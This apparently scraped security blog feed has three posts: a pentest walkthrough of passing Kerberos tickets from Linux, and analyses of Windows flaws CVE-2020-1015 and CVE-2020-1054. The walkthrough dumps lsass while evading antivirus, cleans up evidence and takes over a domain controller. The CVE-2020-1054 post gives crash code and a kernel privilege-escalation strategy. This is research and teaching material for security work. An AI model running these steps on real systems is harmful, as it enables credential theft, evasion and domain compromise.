Normal view

There are new articles available, click to refresh the page.

Before yesterday0xeb_bp

0xeb_bp
Practical Guide to Passing Kerberos Tickets From Linux
21 November 2019 at 14:00

Practical Guide to Passing Kerberos Tickets From Linux

21 November 2019 at 14:00

This goal of this post is to be a practical guide to passing Kerberos tickets from a Linux host. In general, penetration testers are very familiar with using Mimikatz to obtain cleartext passwords or NT hashes and utilize them for lateral movement. At times we may find ourselves in a situation where we have local admin access to a host, but are unable to obtain either a cleartext password or NT hash of a target user. Fear not, in many cases we can simply pass a Kerberos ticket in place of passing a hash.

This post is meant to be a practical guide. For a deeper understanding of the technical details and theory see the resources at the end of the post.

Tools

To get started we will first need to setup some tools. All have information on how to setup on their GitHub page.

Impacket

https://github.com/SecureAuthCorp/impacket

pypykatz

https://github.com/skelsec/pypykatz

Kerberos Client (optional)

RPM based: yum install krb5-workstation
Debian based: apt install krb5-user

procdump

https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

autoProc.py (not required, but useful)

wget https://gist.githubusercontent.com/knavesec/0bf192d600ee15f214560ad6280df556/raw/36ff756346ebfc7f9721af8c18dff7d2aaf005ce/autoProc.py

Lab Environment

This guide will use a simple Windows lab with two hosts:

dc01.winlab.com (domain controller)
client01.winlab.com (generic server

And two domain accounts:

Administrator (domain admin)
User1 (local admin to client01)

Passing the Ticket

By some prior means we have compromised the account user1, which has local admin access to client01.winlab.com.

A standard technique from this position would be to dump passwords and NT hashes with Mimikatz. Instead, we will use a slightly different technique of dumping the memory of the lsass.exe process with procdump64.exe from Sysinternals. This has the advantage of avoiding antivirus without needing a modified version of Mimikatz.

This can be done by uploading procdump64.exe to the target host:

And then run:

procdump64.exe -accepteula -ma lsass.exe output-file

Alternatively we can use autoProc.py which automates all of this as well as cleans up the evidence (if using this method make sure you have placed procdump64.exe in /opt/procdump/. I also prefer to comment out line 107):

python3 autoProc.py domain/user@target

We now have the lsass.dmp on our attacking host. Next we dump the Kerberos tickets:

pypykatz lsa -k /kerberos/output/dir minidump lsass.dmp

And view the available tickets:

Ideally, we want a krbtgt ticket. A krbtgt ticket allows us to access any service that the account has privileges to. Otherwise we are limited to the specific service of the TGS ticket. In this case we have a krbtgt ticket for the Administrator account!

The next step is to convert the ticket from .kirbi to .ccache so that we can use it on our Linux host:

kirbi2ccache input.kirbi output.ccache

Now that the ticket file is in the correct format, we specify the location of the .ccache file by setting the KRB5CCNAME environment variable and use klist to verify everything looks correct (if optional Kerberos client was installed, klist is just used as a sanity check):

export KRB5CCNAME=/path/to/.ccache
klist

We must specify the target host by the fully qualified domain name. We can either add the host to our /etc/hosts file or point to the DNS server of the Windows environment. Finally, we are ready to use the ticket to gain access to the domain controller:

wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn

Excellent! We were able to elevate to domain admin by using pass the ticket! Be aware that Kerberos tickets have a set lifetime. Make full use of the ticket before it expires!

Conclusion

Passing the ticket can be a very effective technique when you do not have access to an NT hash or password. Blue teams are increasingly aware of passing the hash. In response they are placing high value accounts in the Protected Users group or taking other defensive measures. As such, passing the ticket is becoming more and more relevant.

Resources

https://www.tarlogic.com/en/blog/how-kerberos-works/

https://www.harmj0y.net/blog/tag/kerberos/

Thanks to the following for providing tools or knowledge:

0xeb_bp
CVE-2020-1015 Analysis
12 May 2020 at 14:00

CVE-2020-1015 Analysis

0xeb_bp

12 May 2020 at 14:00

This post is an analysis of the April 2020 security patch for CVE-2020-1015. The bug was reported by Shefang Zhong and Yuki Chen of the Qihoo 360 Vulcan team. The description of the bug from Microsoft:

An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.

Microsoft assigned this bug an exploitability rating of 2. Information pulled from the Microsoft Exploitability Index shows this means an attacker would likely have difficulty creating the code, requiring expertise and/or sophisticated timing, and/or varied results when targeting the affected product.

This bug is likely not the most ideal candidate for a fully functioning and reliable exploit. Especially when taking in consideration other EoPs from the April 2020 security patches with an exploitability rating of 1. In any case, it will be interesting to see why the exploitability rating was assigned, and the root cause of the bug.

The remainder of this post will follow the steps I took to analyze the security patch and put together simple proof of concept code for a working crash.

Patch Diffing Windows 10 1903 umpo.dll

To get started we will first need to grab a patched and non-patched version of the relevant file. While not a foolproof method, search engining “User-Mode Power Service file” points us to umpo.dll. We will focus our efforts on the changes in this dll. A patched version can be grabbed by downloading and extracting the .dll from the relevant KB or from an updated Windows 10 system. The non-patched version can be grabbed from a Windows 10 system prior to updating it with April’s updates.

To perform the patch diff I will use Diaphora. Diaphora shows that two functions have been modified UmpoRpcLegacyEventRegisterNotification and UmpoNotifyRegister:

A third function, UmpoNotifyUnregister, is unmatched and has been removed from the patched version of umpo.dll.

Reading these modified function names sounds like the vulnerability could be a use after free.

Modified Functions Analysis

Now that the modified functions are known it is time to start reviewing them to identify the bug. Quickly looking at both modified functions reveals that they are not very long. To get an idea of how the functions are called we will check the cross references to each function. There are no cross references from another function to UmpoRpcLegacyEventRegisterNotification. Based on the name it is likely invoked via an RPC call. UmpoNotifyRegister however has one:

UmpoRpcLegacyEventRegisterNotification

We will delve deeper into UmpoRpcLegacyEventRegisterNotification. I prefer to do dynamic analysis whenever possible, so we will fire up WinDbg and put a breakpoint on the target function:

The function declaration:

__int64 UmpoRpcLegacyEventRegisterNotification(__int64 a1, 
                                               __int64 a2, 
                                               const wchar_t *a3, 
                                               int a4)

Since this is likely an RPC call (which we will verify later) we will assume the first argument is the RPC binding handle and ignore it. The arguments appear pretty straightforward:

a3 is a wchar_t which in this case is a service name. a2 is some value that does not point to valid memory so is likely utilized as some constant or identifier. a4 is 0. We will keep track of a4 and see what other potential values it could be. The first section of interesting code marked up with comments is:

  v14 = 0i64;
  v4 = a4;
  v5 = a3;
  v6 = a2;

  // Return if not local client (local RPC only)
  if ( !(unsigned int)UmpoIsClientLocal() )
    return 5i64;

  // Get some object
  v7 = UmpoGetSettingEntry();
  // If not NULL
  if ( v7 )
  {
    // Get another object at v7+32
    v8 = (__int64 *)(v7 + 32);
    // Walk circular linked list until back at head
    for ( i = *v8; (__int64 *)i != v8; i = *(_QWORD *)i )
    {
      // Breaks if object offset 20 == 1 and
      // if object offset 24 == a2
      if ( *(_DWORD *)(i + 20) == 1 && *(_QWORD *)(i + 24) == v6 )
        goto LABEL_11;
    }
    // If not found set i to 0
    i = 0i64;
LABEL_11:
    // If found within circular linked list set v14 to object pointer
    v14 = i;
  }

A reference to an object is obtained by calling UmpoGetSettingEntry(). This object contains a pointer to another object at offset 32. This object appears to be a circularly linked list that is walked in a loop. If the object member at offset 24 is equal to a3 and the object member at offset 20 is equal to 1 the loop breaks.

The second section of interesting code is:

  // if a4
  if ( v4 )
  {
   // if section 1 code loop does not find anything i is 0
    if ( !i )
      return 0i64;
    // otherwise unregister
    result = UmpoNotifyUnregister(i);
  }
  // if a4 == 0 (our current case)
  else
  {
    if ( i )
      return 0i64;
    // Get sessionID of service
    v10 = WTSGetServiceSessionId();
    // call UmpoNotifyRegister
    result = UmpoNotifyRegister(v12, v11, v10, v6, v5, &v14);
  }

This section reveals the purpose of a4. If a4 is non-zero UmpoNotifyUnregister is called with the address returned from the section one code loop. If a4 is 0 UmpoNotifyRegister is called. For documentation purposes we can reduce this function to:

__int64 UmpoRpcLegacyEventRegisterNotification(
   // RPC Binding Handle
   __int64 a1, 
   // Handle
   __int64 a2, 
   // Service Name
   const wchar_t *a3, 
   // 0 to Register 1 to Unregister
   int a4)

UmpoNotifyRegister

This brings us to the second modified function UmpoNotifyRegister. This function is a bit longer than the previous, but still relatively short. Less relevant sections will be omitted. From our work done reversing the last function we already have a good idea of the arguments:

__int64 __fastcall UmpoNotifyRegister(
    // Set to 0 
    STRSAFE_LPCWSTR pszSrc, 
    // Set to 0 
    __int64 a2, 
    // SessionID
    int a3, 
    // Handle
    __int64 a4, 
    // Service Name
    const wchar_t *pszSrca, 
    // Reference to return to calling function? 
    __int64 *a6)

The first interesting section of the second target function:

  v6 = a4;
  v7 = a3;
  v8 = 0;

  EnterCriticalSection(&UmpoNotification);
  if ( service_name )
  {
    v9 = service_name;
    v10 = 256i64;
    // walk through string until null char is encountered
    // or 256 characters are read
    do
    {
      if ( !*v9 )
        break;
      ++v9;
      --v10;
    }
    while ( v10 );
    // v11 set to error code if error if str len > 256
    v11 = v10 == 0 ? 0x80070057 : 0;
    if ( v10 )
      // v12 set to length of string
      v12 = 256 - v10;
    else
      v12 = 0i64;
  }
  else
  {
    v12 = 0i64;
    v11 = -2147024809;
  }

EnterCriticalSection is called to synchronize shared access to an object. Then service_name (which is our service name argument) is walked until a null character is encountered to determine the length of the string.

The second section is the bulk of the function. This function allocates space for a struct that we will call registrant (r for short in the code comments). It turns out that this struct makes up the circular linked list (actually a doubly circular linked list) walked in the for loop in section one of the first function analyzed. The function then populates the new object with the relevant data from our function call arguments, and inserts the object into the front of the list. The struct is defined (rust syntax) as:

struct registrant {
    // pointer to next
    next: usize,
    // pointer to prev
    prev: usize,
    // set to 1 after alloc
    count: u32, 
    // Flags
    flags: u32, 
    // handle we pass
    handle: usize, 
    // heap alloc which is size of service_name + 2 for null char
    service_name: usize,
    // sessionID
    session_id: u32,
    // unknown, might be two u16s
    unknown: u32,
}

With the above struct definition the below code should be relatively straight forward to follow:

 // if no error on service_name length check
 if ( !v11 )
  {
    v13 = (_QWORD *)UmpoGetSettingEntry();
    v11 = 8;
    ...
    // allocate registrant struct memory 48 bytes
    v14 = RtlAllocateHeap(UmpoHeapHandle, 8i64, 48i64);
    v15 = v14;

    // error case on alloc
    if ( !v14 )
      goto LABEL_20;

    v16 = UmpoHeapHandle;
    // r->count is set to 1
    *(_DWORD *)(v14 + 16) = 1;
    // r->prev is set to itself
    *(_QWORD *)(v14 + 8) = v14;
    // r->next is set to itself
    *(_QWORD *)v14 = v14;
    // allocate memory for r->service_name
    v17 = (wchar_t *)RtlAllocateHeap(v16, 8i64, (unsigned int)(2 * v12 + 2));
    // set r->service_name pointer to allocated memory
    *(_QWORD *)(v15 + 32) = v17;

    // error case on alloc
    if ( !v17 )
    {
LABEL_18:
      if ( v15 )
        UmpoDereferenceRegistrant((__int64 *)v15);
LABEL_20:
      if ( v13 && v8 )
        RtlFreeHeap(UmpoHeapHandle, 0i64);
      goto LABEL_21;
    }

    // set r->flags set to 1
    *(_DWORD *)(v15 + 20) = 1;
    // set r->handle to a4 (handle)
    *(_QWORD *)(v15 + 24) = v6;
    // copy func arg service_name into r->service_name
    StringCchCopyW(v17, v12 + 1, pszSrca);
    // umpo!UmpoNotifyRegister+0x111: lea rax, [rsi+20h] 
    v18 = v13 + 4;
    // set r->session_id
    *(_DWORD *)(v15 + 40) = v7;
    // v19 = settingEntry head->next
    v19 = v13[4];
    // check if linked list head->next->prev == head  
    if ( *(_QWORD **)(v19 + 8) == v13 + 4 )
    {
      // inserting at head of list  
      // set r->next to head->next
      *(_QWORD *)v15 = v19;
      // set r->prev to head
      *(_QWORD *)(v15 + 8) = v18;
      // set head->next->prev to r
      *(_QWORD *)(v19 + 8) = v15;
      // set head->next to r
      *v18 = v15;
      // set r+44 to 0
      *(_BYTE *)(v15 + 44) = 0;

UmpoNotifyUnregister

The final function change was the removal of UmpoNotifyUnregister. This function calls EnterCriticalSection and then UmpoDereferenceRegistrant. UmpoDereferenceRegistrant performs some error checks, removes the registrant struct from the doubly linked list and frees both heap allocations performed in UmpoNotifyRegister.

Bug Analysis

We now have a good understanding of the modified/removed functions. Let’s look at the April umpo.dll function changes to see if we can spot the security vulnerability. Solely looking at the Diaphora results it appears that there are quite a few modifications. However with our new understanding of the code, the modifications essentially boil down to one glaring change from a security perspective. EnterCriticalSection and LeaveCriticalSection have been moved from UmpoNotifyRegister to UmpoRpcLegacyEventRegisterNotification. Critical sections are used to synchronize simultaneous access to a shared object within a process. Errors in synchronizing access to shared data produces bugs. Conspicousouly, EnterCriticalSection is moved right above the call to UmpoGetSettingEntry (section one of first function analyzed).

At this point the bug is becoming apparent. UmpoGetSettingEntry returns a global variable which contains a pointer to the head of our doubly circular linked list of registrant objects. The non-patched code does not correctly synchronize access to this object. This error results in a race condition.

Race conditions are bugs, but in a sense are not directly exploitable. Rather, they provide a pathway to a security violation. Initially, the race must be won, which allows the security violation. The violation then must be taken advantage of. With this in mind, let’s think of how this race condition can be taken advantage of. As mentioned earlier, the names of the modified functions invokes the use after free vulnerability class. Following this line of thought, it is straightforward to imagine a scenario where the race condition results in a use after free. Take for example the following scenario with two threads:

Thread 1 enters UmpoRpcLegacyEventRegisterNotication.
Thread 1 accesses linked list registrant shared object.
Thread 1 obtains pointer to target registrant struct.
Thread 1 enters UmpoNotifyUnregister.
Thread 2 enters UmpoRpcLegacyEventRegisterNotication.
Thread 1 enters UmpoDereferenceRegistrant.
Thread 2 accesses linked list registrant shared object.
Thread 2 obtains pointer to target registrant struct.
Thread 1 frees registrant struct memory.

At this point the thread 2 pointer to the target registrant struct is dangling.

Exploitation PoC to Trigger Crash

To verify that the bug analysis is accurate we must write a simple PoC to trigger the race condition and use after free. Based on the name of UmpoRpcLegacyEventRegisterNotication we have previously assumed that this function is invoked via RPC. To verify this we will use the extremely useful tool NtObjectManager written by James Forshaw.

After importing the NtObjectManager module we can run the below command (more information on this tool here and here):

This provides all RPC functions we can call from umpo.dll. Reviewing the ouput we see our function:

HRESULT UmpoRpcLegacyEventRegisterNotification(
    /* Stack Offset: 0 */ handle_t p0, 
    /* Stack Offset: 8 */ [In] UIntPtr p0, 
    /* Stack Offset: 16 */ [In] /* FC_SUPPLEMENT FC_C_WSTRING Range(0, 256) */ 
    wchar_t* p1, 
    /* Stack Offset: 24 */ [In] int p2);

We will take all the output from the tool and use that to create our .idl file to make the RPC call. The crash PoC is very simple and the code is available here. The necessary RPC binding initialization is set up and two threads are started.

Thread one repeatedly registers a registrant struct. Thread two randomly flips between registering and unregistering. The service_name argument to UmpoRpcLegacyEventRegisterNotication is set up to be the same size heap allocation as the registrant struct itself (48 bytes) to populate the freed memory. After running the crash code for a bit we get a crash!

The crash occurs in UmpoRpcLegacyEventRegisterNotication referencing the invalid memory 41414141`41414155, which is our data.

Thanks to Shefang Zhong, Yuki Chen, and James Forshaw for providing tools and knowledge that greatly helped:

tiraniddo

0xeb_bp
CVE-2020-1054 Analysis
15 June 2020 at 14:00

CVE-2020-1054 Analysis

0xeb_bp

15 June 2020 at 14:00

This post is an analysis of the May 2020 security vulnerability identified by CVE-2020-1054. The bug is an elevation of privilege in Win32k. The bug was reported by Netanel Ben-Simon and Yoav Alon from Check Point Research as well as bee13oy of Qihoo 360 Vulcan Team. I highly recommend viewing Netanel and Yoav’s talk from OffensiveCon20 Bugs on the Windshield: Fuzzing the Windows Kernel, which provides insight into how they found this and other bugs.

The remainder of this post will follow the steps I took to analyze the bug and write a proof of concept exploit targeting Windows 7 x64 (fully patched until Microsoft stopped supporting it).

The Crash

Netanel and Yoav kindly provided crash code. This code was a great starting point and I did not do any patch diffing. Patch diffing can still be very useful under these circumstances, however I found it unnecessary in this case.

The provided crash code:

int main(int argc, char *argv[])
{
    LoadLibrary("user32.dll");
    HDC r0 = CreateCompatibleDC(0x0);
    // CPR's original crash code called CreateCompatibleBitmap as follows
    // HBITMAP r1 = CreateCompatibleBitmap(r0, 0x9f42, 0xa);
    // however all following calculations/reversing in this blog will 
    // generally use the below call, unless stated otherwise
    // this only matters if you happen to be following along with WinDbg
    HBITMAP r1 = CreateCompatibleBitmap(r0, 0x51500, 0x100);
    SelectObject(r0, r1);
    DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc, 
        0x0, 0x0, 0x6);

    return 0;
}

Reviewing the documentation for CreateCompatibleBitmap and DrawIconEx is suggested.

My first step was to rewrite the code in Rust and run it on a Windows 7 x64 box. Below is a snippet of the WinDbg bugcheck analysis:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: fffff904c7000240, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff960000a5482, If non-zero, the instruction address which referenced 
    the bad memory address.
Arg4: 0000000000000005, (reserved)

Some register values may be zeroed or incorrect.
rax=fffff900c7000000 rbx=0000000000000000 rcx=fffff904c7000240
rdx=fffff90169dd8f80 rsi=0000000000000000 rdi=0000000000000000
rip=fffff960000a5482 rsp=fffff880028f3be0 rbp=0000000000000000
 r8=00000000000008f0  r9=fffff96000000000 r10=fffff880028f3c40
r11=000000000000000b r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po cy
win32k!vStrWrite01+0x36a:
fffff960`000d5482 418b36   mov esi,dword ptr [r14] ds:00000000`00000000=????????

STACK_TEXT:  
nt!RtlpBreakWithStatusInstruction
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x722
nt!KeBugCheckEx+0x104
nt!MmAccessFault+0x736
nt!KiPageFault+0x35c
win32k!vStrWrite01+0x36a
win32k!EngStretchBltNew+0x171f
win32k!EngStretchBlt+0x800
win32k!EngStretchBltROP+0x64b
win32k!BLTRECORD::bStretch+0x642
win32k!GreStretchBltInternal+0xa43
win32k!BltIcon+0x18f
win32k!DrawIconEx+0x3b7
win32k!NtUserDrawIconEx+0x14d
nt!KiSystemServiceCopyEnd+0x13
USER32!ZwUserDrawIconEx+0xa
USER32!DrawIconEx+0xd9
cve_2020_1054!CACHED_POW10 <PERF> (cve_2020_1054+0x106d)

The crash happens at win32k!vStrWrite01+0x36a on the instruction mov esi,dword ptr [r14]. Setting a breakpoint on this instruction yields the following:

It is clear that the crash occurs due to an invalid memory reference. This matches the WinDbg bugcheck analysis. CheckPoint Research tweeted about this vulnerability, describing it as an out-of-bounds (OOB) write.

I will work under the assumption that this value (fffff904'c7000240 in the crash) is what can be controlled for the OOB write. Note that the value c7000240 will be continually referenced to throughout the blog post. This value changes across system reboots and sometimes per program execution, however for the sake of continuity will remain the same.

Controlling OOB Write

The first goal is to understand how the address fffff904'c7000240 can be controlled, which will be referred to as oob_target. To accomplish this, the relevant parts of vStrWrite01 need to be reversed. Working backwards from mov esi,dword ptr [r14], r14 is set with lea r14, [rcx + rax*4]:

Working further backwards rcx is initialized in one of the first basic blocks of vStrWrite01. After that, rcx is manipulated in a loop:

rcx is added to by a constant value in the loop. Looking at the assembly this is add ecx, eax. A psuedo-code loop snippet:

var_64h = 0x7fffffff; 
var_6ch = 0x80000000;
while ( r11d )
{
    --r11d;
    if ( ebp >= var_6ch && ebp < var_6ch )
    {
        // oob read/write in here
    }
    ++ebp;
    ecx += eax;
}

With this information a rough formula arises for oob_target:

oob_target = initial_value + loop_iterations * eax

The next logical step is to determine what controls the number of loop iterations. Reviewing the assembly, ebp is set via the following instructions:

mov rsi, rcx // rcx is still arg0 here
...
mov ebp, [rsi]

ebp is set to the first dword of arg0 of vStrWrite01. Dumping the content of rcx at the top of vStrWrite01:

win32k!vStrWrite01:
fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c4c76eb0  fff2aaab 0006aaab

fff2aaab is not identical, but it gives the feeling that it is related to arg5 of DrawIconEx. Changing the value from 0xfebffffc to 0xfebffffd:

win32k!vStrWrite01:
fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c2962eb0  fff2aaac 0006aaaa

The result is fff2aaac. This indicates that it is related.

Altering arg5 and observing the changes to oob_target provides additional insight.

If arg5 = 0xff000000 there is a minor change to oob_target:

win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff903`c7000240  ????????`???????? ????????`????????

If arg5 = 0xfd00000 there is a major change to oob_target:

win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff90a`c7000240  ????????`???????? ????????`????????

Interestingly, no matter the value of arg5 the lower 32 bits of oob_target remains c7000240. Additionally, a decrease in the value of arg5 (treating as unsigned) results in an increase in oob_target.

eax in the oob_target formula is set via an offset from r15:

Offsets from r15 are commonly used in the beginning of vStrWrite01. This indicates that r15 could contain the address to some structure. In the second basic block of the function r15 is set as follows:

mov r15, r8 // r8 is still arg2 here

r15 is set to arg2 of vStrWrite01. Dumping arg2 at the start of the function:

The two red boxes mark values that are known. The first red box is arg1 (bitmap width 0x51500) and arg2 (bitmap height 0x100) passed to CreateCompatibleBitmap. The second red box marks a value, c7000240, that has been seen multiple times. This is the lower 32 bits of oob_target. Lastly, the blue box marks eax in the oob_target formula.

The above memory layout within the context of Win32k bitmaps may look familiar, and indeed it is two adjecent structures, BASEOBJECT and SURFOBJ, that are well known in Windows kernel exploit development. In other words, the first red box is SURFOBJ.sizlBitmap, the second red box is SUFOBJ.pvScan0, and the blue box is SURFOBJ.lDelta. More information on these structures is available here. This is a critical piece of information that will be utilized later.

The next step, however, is to fully understand how iterations from the oob_target formula is controlled via arg5 of DrawIconEx. Determining this information follows a similar process as used above, but with additional steps. For this reason, only the results will be shared. The relevant function, vInitStrDDA in the notes.txt file of my GitHub repo contains extra detail.

DrawIconEx arg5’s control of loop_iterations is determined by the following formula (written in Python):

# arg5 of DrawIconEx()
arg5 = 0xffb00000
# arg1 of CreateCompatibleBitmap()
arg1 = 0x51500

loop_iterations = ((1 - arg5) & 0xffffffff) // 0x30

lDelta = arg1 // 8

oob = loop_iterations * lDelta     
upper32_inc = oob & 0xffffffff00000000

print("loop_iterations          = %x" % loop_iterations)
print("lDelta                   = %x" % lDelta)
print("upper 32 inc.            = %x" % upper32_inc)

What was discovered was that arg1 of CreateCompatibleBitmap and arg5 of DrawIconEx directly control the values of both loop_iterations and lDelta. However, the lower 32 bits of oob_target always remain the same. This means only the upper 32 bits of the write address are controllable.

The next step is to determine what is written and to what extent it can be controlled. Reviewing the assembly of vStrWrite01 two writes can be performed:

// write 1
win32k!vStrWrite01+0x417
mov     dword ptr [r14],esi
// write 2
win32k!vStrWrite01+0x461
mov     dword ptr [r14],esi

The content of esi is determined by either of the following:

esi is either bitwise OR’d or bitwise AND’d with some value.

Running the crash code calls DrawIconEx as:

DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc,
        0x0, 0x0, 0x6);

Using this call to DrawIconEx the path to the bitwise AND is always taken. Because esi is set via bitwise operations, the diFlags (arg8) parameter of the DrawIconEx stands out to me. The current call sets this parameter to 0x6. Reviewing the documentation for this flag shows that 0x6 is equivalent to DI_IMAGE which “Draws the icon or cursor using the image”. The flag DI_MASK sounds promising, and sure enough setting diFlags (arg8) to 0x1 changes execution flow to the OR branch.

Exploitation Strategy

Now that the capabilities of the OOB write are understood it is time to develop an exploitation strategy. The capabilites are a far cry from an all powerful write-what-where, however in situations like these I like to recall that it is possible to exploit a single byte NULL overflow.

At this point I strongly suggest reviewing/reading Abusing GDI Reloaded and Abusing GDI for ring0 exploit primitives. A brief explanation of these papers follows.

The SURFOBJ struct contains useful members such as pvScan01 and sizlBitmap. pvScan01 points to the actual bitmap data. This data can be read/written to using GetBitmapBits and SetBitMapBits. sizlBitMap is two dwords that contain the height and width of the bitmap. Clasically, two SURFOBJ structures are utilized. A write-what-where is used to overwrite the first SURFOBJ’s (referred to as Manager) pvScan01 with the value of the second SURFOBJ’s (referred to as Worker) pvScan01 address. This then allows a reusable/relocatable write-what-where primitive. The capabilities of this OOB write are listed as:

what is a value either bitwise OR'd or AND'd
where is a value >= fffff901'c7000240

Obviously this does not meet the classical requirements. Fortunately, there is another option taking advantage of sizlBitmap. On Windows 7 (and older versions of Windows 10) the SURFOBJs and their pvScan01 member contents are laid out contiguously. This means that if it is possible to increase either the width or height of sizlBitmap it will be possible to write out-of-bounds of the SURFOBJ’s pvScan01 using a call to SetBitMapBits. If a second SURFOBJ is allocated after the first SURFOBJ, this object’s pvScan01 address can be overwritten. This second SURFOBJ can then be used via SetBitMapBits for a powerful write-what-where primitive.

Taking all the information learned up to this point a rough exploitation strategy can be formulated.

1. Allocate a base bitmap (fffff900'c700000).
2. Allocate enough SURFOBJs (via calls to CreateCompatibleBitmap) such that 
   one is allocted at fffff901'c7000000.
2.1. A second is allocated directly after the first.
2.2. A third is allocated directly after the second.
2. Calculate loop_iterations*lDelta such that it is equal to fffff901'c7000240.
3. Use OOB write to overwrite width or height of second SURFOBJ's sizlBitmap.
4. Use SetBitMapBits with second SURFOBJ to overwrite pvScan01 of third SURFOBJ.
5. Arbitrary reusable write is now obtained.
6. Typical EoP overwrite process token privileges and inject into winlogon.exe.

A bad visual represenation:

Every step is easily accomplished with the exception of step 3. The ‘what’ part of the write is not a problem. As seen earlier it is possible to perform a bitwise OR. This is guaranteed to increase the OR’d value, which is what is required. Accurately targeting width or height of sizlBitmap is the challenge. It may be recalled in the start of the blog post oob_target is set via lea r14, [rcx + rax*4]. Up to this point, rax has been ignored. Now that an attack strategy is created, it is time to see how rax can be controlled to grant greater control of the OOB write.

Testing different parameters of DrawIconEx revealed that arg1 determines the value of rax. rax is then divided by 0x20:

This provides the ability to set an offset from the start of the lower 32 bits where

offset = (arg1 // 0x20 ) * 0x4 + 0x240

Testing arguments to DrawIconEx with breakpoints on both mov dword ptr [r14],esi instructions also uncovered useful information. arg2 of DrawIconEx controls the number of iterations through a loop where writes are performed on the bitmap data. For example, if 0x5 is passed as arg2, then 0x5 sets of writes are executed:

The difference between sets of writes is equivalent to an earlier variable, lDelta. This can be written in psuedo code as:

intial_value = 0xfffff901`c7000240 + (arg1 // 0x20) * 0x4;
loop_count = 0;
while(arg2) 
{
    write_location_1 = intial_value + lDelta * loop_count;
    write location_2 = write_location_1 + 4;
    --arg2;
    ++loop_count;
}

Effectively, three values need to be solved for such that at some point through the loop write_location_1 and write_location_2 land on surfobj1’s csizlBitmap. The three values are arg1, arg2 and lDelta (width of bitmap // 8).

This can be bruteforced with ugly Python:

print("bruting function arguments...") 

# start with size at 0x50000 
for size in range(0x50000, 0xffffff):
    lDelta = size // 0x8 
    # lDelta is always byte alligned so ignore if not
    if lDelta & 0x0f == 0:
        for arg1 in range(0x0, 0xfff, 0x20):
            offset = (arg1 // 0x20) * 0x4 + 0x240
            for arg2 in range(0x0,0x10):
                write_target = offset + arg2 * lDelta
                if write_target == 0x70038:
                    print("found: size {:x}, offset (arg1) {:x}, lDelta {:x}, \
                    loop_count (arg2) {:x}".format(size, arg1, lDelta, arg2))

Now that all values are understood, all that remains is to write the exploit code.

Exploitation Code

Exploitation code is available on my GitHub. Demoing the exploit:

Windows 7 KB

Testing the exploit on Windows 7 has proved to be very reliable. However, there is room for improvment to make memory calculations completely generic. While testing, I found that a certain Windows KB modified the SURFOBJ struct slightly. Essentially, instead of the offset being 0x240 it is 0x238. Within the exploit code are 2 comments that mark what value to use depending if the Windows 7 host is pre- or post-KB. I have narrowed down the KBs and will update with the exact KB later.

Thanks to Netanel Ben-Simon, Yoav Alon and bee130y for finding the bug: